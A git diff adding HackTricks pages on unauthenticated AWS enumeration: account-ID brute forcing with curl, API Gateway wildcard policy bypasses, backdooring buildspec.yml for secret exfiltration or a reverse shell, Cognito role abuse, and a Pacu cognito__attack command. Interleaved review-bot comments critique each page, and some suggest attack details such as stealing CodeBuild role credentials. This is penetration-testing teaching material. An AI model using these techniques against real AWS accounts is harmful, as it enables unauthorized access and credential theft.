list-tags-for-resource --resource-arn +``` + +### Privesc + +In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/eventbridgescheduler-privesc.md" %} +[eventbridgescheduler-privesc.md](../aws-privilege-escalation/eventbridgescheduler-privesc.md) +{% endcontent-ref %} + +## References + +* 
[https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md new file mode 100644 index 0000000000..c999e66cee --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md @@ -0,0 +1,80 @@ +# AWS - Unauthenticated Enum & Access + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
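Review bot: the `### Enumeration` section of eventbridgescheduler-enum.md never mentions the one field an attacker cares about: every schedule carries an execution role in `Target.RoleArn` that Scheduler assumes to call the target, and `get-schedule` also returns `Target.Input`, the payload handed to Lambda, ECS, SQS and the rest. The privesc page linked right below depends on that role, so a comment after `aws scheduler get-schedule --name <name>` such as `# Note Target.RoleArn (role the scheduler assumes) and Target.Input` would make the section useful. The `--name` and `--resource-arn` arguments are missing placeholders, and `get-schedule`/`get-schedule-group` need `--group-name <group>` when the schedule does not live in the `default` group. Minor: `## EventBridge Scheduler` appears twice, once above the hint banner and once below it; drop the first.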
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS Credentials Leaks + +A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ +Some useful **tools**: + +* [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) +* [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) +* [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) + +## AWS Unauthenticated Enum & Access + +There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: + +* [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) +* [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +* [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) +* [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +* [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) +* [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) +* [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) +* [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) +* [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) +* [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) +* [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) 
+* [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) +* [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) +* [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) +* [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) +* [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) +* [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) +* [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) + +## Cross Account Attacks + +In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. + +During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: + +![](<../../../.gitbook/assets/image (260).png>) + +Other services found vulnerable: + +* AWS Config +* Serverless repository + +## Tools + +* [**cloud\_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md new file mode 100644 index 0000000000..e3a79d5b15 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md @@ -0,0 +1,71 @@ +# AWS - Accounts Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
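Review bot: the service list under `## AWS Unauthenticated Enum & Access` in the README is out of sync with this patch: the same diff adds aws-api-gateway-unauthenticated-enum.md, aws-codebuild-unauthenticated-access.md and aws-dynamodb-unauthenticated-access.md, but none of them is linked here, while the Cloud9 and Cloudsearch bullets point at `.../broken-reference/README.md`, a dead GitBook link; either link the real pages or drop those two bullets. In `## Cross Account Attacks`, `**AWS services without specifying accounts ID** were allowed` should state the actual bug: a resource policy that trusts a service principal (for example `cloudtrail.amazonaws.com`) without an `aws:SourceAccount` or `aws:SourceArn` condition lets that service act on the resource on behalf of any AWS account. The bold in `allowing cloudtrai**l**` is misplaced, and `cloud infa` should be `cloud infra`.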
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Account IDs + +If you have a target there are ways to try to identify account IDs of accounts related to the target. + +### Brute-Force + +You create a list of potential account IDs and aliases and check them + +```bash +# Check if an account ID exists +curl -v https://.signin.aws.amazon.com +## If response is 404 it doesn't, if 200, it exists +## It also works from account aliases +curl -v https://vodafone-uk2.signin.aws.amazon.com +``` + +You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). + +### OSINT + +Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. + +### Marketplace + +If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. + +### Snapshots + +* Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) +* RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) +* Public AMIs (EC2 -> AMIs -> Public images) + +### Errors + +Many AWS error messages (even access denied) will give that information. + +## References + +* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md new file mode 100644 index 0000000000..24abdac6e2 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md @@ -0,0 +1,85 @@ +# AWS - API Gateway Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
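Review bot: the brute-force snippet in aws-accounts-unauthenticated-enum.md lost its placeholder: `curl -v https://.signin.aws.amazon.com` should be `curl -v https://<account-id>.signin.aws.amazon.com`, and since `-v` dumps headers rather than a bare status, `curl -s -o /dev/null -w '%{http_code}' https://<account-id>.signin.aws.amazon.com` matches the status check the comment describes. The comment's `if 200, it exists` is worth re-verifying: the sign-in host may answer a valid account or alias with a 3xx redirect to `/console` rather than 200, in which case `!= 404` is the right test. The `### Errors` bullet is too vague to act on; say what is meant, that AccessDenied messages echo the full ARN of the denied principal or target resource, which contains the account ID. Grammar: `of the AWS account he used` -> `of the AWS account the vendor used`.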
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### API Invoke bypass + +According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Permission", + "Action": [ + "execute-api:Execution-operation" + ], + "Resource": [ + "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" + ] + } + ] +} +``` + +The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. + +Some examples: + +* A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. + +{% hint style="warning" %} +Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ +So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ +Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. +{% endhint %} + +You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. 
+ +For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). + +### IAM Policy Injection + +In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. + +### Public URL template + +``` +https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} +``` + +### Get Account ID from public API Gateway URL + +Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ +This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). + +You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md new file mode 100644 index 0000000000..8f553e9b71 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md @@ -0,0 +1,37 @@ +# AWS - Cloudfront Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
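Review bot: both example ARNs under `### API Invoke bypass` use a wrong service prefix, `arn:aws:execute-apis:...`; the service is `execute-api`, exactly as in the docs snippet above them (`arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path`), and a policy written with `execute-apis` matches nothing. The JSON block should also be labelled as the docs template rather than a valid policy: `"Effect": "Permission"` and `"execute-api:Execution-operation"` are placeholders for `Allow`/`Deny` and for `execute-api:Invoke` (or `InvalidateCache`/`ManageConnections`). In the warning hint, `Can validate a post request to test stage to the path /prod/GET/dashboard/admin` reads better as `will also match a POST to the test stage on the path /prod/GET/dashboard/admin, because the * in the api-id position absorbs api-id/test/POST`, which spells out why the wildcard crosses the slash boundaries.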
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public URL template + +``` +https://{random_id}.cloudfront.net +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md new file mode 100644 index 0000000000..9d42277538 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md @@ -0,0 +1,61 @@ +# AWS - CodeBuild Unauthenticated Access + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
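Review bot: aws-cloudfront-unauthenticated-enum.md is a bare URL template with no technique and no cross-reference, unlike its siblings (the CodeBuild page opens with a `{% content-ref %}` to its service-enum page). Add the equivalent content-ref and at least one sentence on what an unauthenticated tester can do with a `*.cloudfront.net` hostname, for instance probing the distribution for a misconfigured or dangling origin; as it stands the page adds nothing beyond the README's list.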
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## CodeBuild + +For more info check this page: + +{% content-ref url="../aws-services/aws-codebuild-enum.md" %} +[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) +{% endcontent-ref %} + +### buildspec.yml + +If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. + +Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. + +For some related information you could check the page about how to attack Github Actions (similar to this): + +{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} +[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) +{% endcontent-ref %} + +## Self-hosted GitHub Actions runners in AWS CodeBuild + +As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: + +```bash +runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} +``` + +This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md new file mode 100644 index 0000000000..26a18d922f --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md @@ -0,0 +1,74 @@ +# AWS - Cognito Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
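Review bot: the `runs-on` line under `## Self-hosted GitHub Actions runners in AWS CodeBuild` lost its project-name placeholder: the label format in the linked docs is `codebuild-<project-name>-${{ github.run_id }}-${{ github.run_attempt }}`, so `codebuild--${{ ... }}` as written would never select a runner. That fence is tagged `bash` but holds workflow YAML. Heading levels are inconsistent too: `### buildspec.yml` is a subsection of `## CodeBuild`, while the runners section is promoted to `##`; keep it at `###`. In the buildspec paragraph, `compromise the **CodeBuild IAM role credentials**` would benefit from saying how: the build container exposes the project role's credentials through the container credentials endpoint (`169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`), which a backdoored `buildspec.yml` can read and exfiltrate with a single `curl`.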
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Unauthenticated Cognito + +Cognito is an AWS service that enable developers to **grant their app users access to AWS services**. Developers will grant **IAM roles to authenticated users** in their app (potentially people willbe able to just sign up) and they can also grant an **IAM role to unauthenticated users**. + +For basic info about Cognito check: + +{% content-ref url="../aws-services/aws-cognito-enum/" %} +[aws-cognito-enum](../aws-services/aws-cognito-enum/) +{% endcontent-ref %} + +### Identity Pool ID + +Identity Pools can grant **IAM roles to unauthenticated users** that just **know the Identity Pool ID** (which is fairly common to **find**), and attacker with this info could try to **access that IAM rol**e and exploit it.\ +Moreoever, IAM roles could also be assigned to **authenticated users** that access the Identity Pool. If an attacker can **register a user** or already has **access to the identity provider** used in the identity pool you could access to the **IAM role being given to authenticated** users and abuse its privileges. + +[**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-identity-pools.md). + +### User Pool ID + +By default Cognito allows to **register new user**. Being able to register a user might give you **access** to the **underlaying application** or to the **authenticated IAM access role of an Identity Pool** that is accepting as identity provider the Cognito User Pool. [**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration). 
+ +### Pacu modules for pentesting and enumeration + +[Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. + +For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. + +#### Usage + +Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: + +```bash +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX +``` + +Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: + +```bash +Pacu (new:test) > run cognito__enum +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md new file mode 100644 index 0000000000..89c2f12cd0 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md @@ -0,0 +1,37 @@ +# AWS - DocumentDB Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
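Review bot: the `### Identity Pool ID` paragraph in aws-cognito-unauthenticated-enum.md should name the two calls that make the pool ID alone sufficient: `aws cognito-identity get-id --identity-pool-id <pool-id>` needs no credentials, and `aws cognito-identity get-credentials-for-identity --identity-id <identity-id>` then returns the unauthenticated role's temporary keys, which is what `Check how to do that here` points at. Wording fixes in the same section: `enable developers` -> `enables developers`, `people willbe able` -> `people will be able`, `Moreoever` -> `Moreover`, `attacker with this info could try to access that IAM rol**e**` -> `an attacker with this info could try to access that **IAM role**`, `underlaying` -> `underlying`, `allows to register new user` -> `allows new users to register`. The Pacu `cognito__attack` sample is wrapped across three lines inside a `bash` fence with no continuation characters, so it will not paste cleanly; join it into one line.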
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public URL template + +``` +.cluster-..docdb.amazonaws.com +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
